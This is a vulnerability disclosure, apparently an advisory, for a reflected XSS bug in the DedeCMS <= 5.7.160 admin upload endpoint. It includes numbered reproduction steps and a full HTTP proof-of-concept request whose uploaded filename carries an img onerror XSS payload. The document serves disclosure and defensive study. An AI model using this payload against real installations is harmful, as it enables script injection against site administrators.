0%

DedeCMS V5.7.160 Backend Reflected XSS

Description

Backend image file upload with reflected-XSS in uploaded filename.

Affected Version

DedeCMS <= 5.7.160

POC

  1. Login to admin backend management.
  2. In /dede/upload.php, upload an new image file named “file”, with the filename contains XSS payload, e.g. <img src=x onerror=alert(1)>.png.
  3. The uploaded filename must ends with a normal image extension, e.g. .png or .jpeg, and the file content must contains the legal image file header, filename should not contains and / or \.
  4. The response of /dede/upload.php contains the XSS payload with the text/html content-type.

In source code, the filename is directly passed through the pathinfo function and assigned to $res['remark'], and finally echoed json encoded array, which contains the XSS payload, and by default, the response content-type is text/html.

Full POC request:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /cms/dedecms/dede/upload.php HTTP/1.1
Host: 192.168.0.3
Content-Length: 317
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8dr4oJI5ByNkMbkK
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: menuitems=1_1%2C4_1%2C5_1%2C6_1%2C2_1%2C3_1; PHPSESSID=n5ibb5j70gj24qh8alr61u6ov2; _csrf_name_1d27e3c9=426b27a62d00e1341c13019bf34f4d05; _csrf_name_1d27e3c91BH21ANI1AGD297L1FF21LN02BGE1DNG=6e24882e1c219de6; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=c7079a345e8c8682; DedeLoginTime=1677347766; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=8163b03f86d69dc6; ENV_GOBACK_URL=%2Fcms%2Fdedecms%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
Connection: close

------WebKitFormBoundary8dr4oJI5ByNkMbkK
Content-Disposition: form-data; name="file"; filename="<img src=x onerror=alert(1)>.png"
Content-Type: image/png

‰PNG

IHDR(-SPLTEà22ßÿêé]‡—³ôœšß&&1œ%dIDAT•c```dbfaec@€‘,¶hQGÜYIEND®B`‚
------WebKitFormBoundary8dr4oJI5ByNkMbkK--

Reference

Reported by Srpopty, vulnerability discovered by using Corax.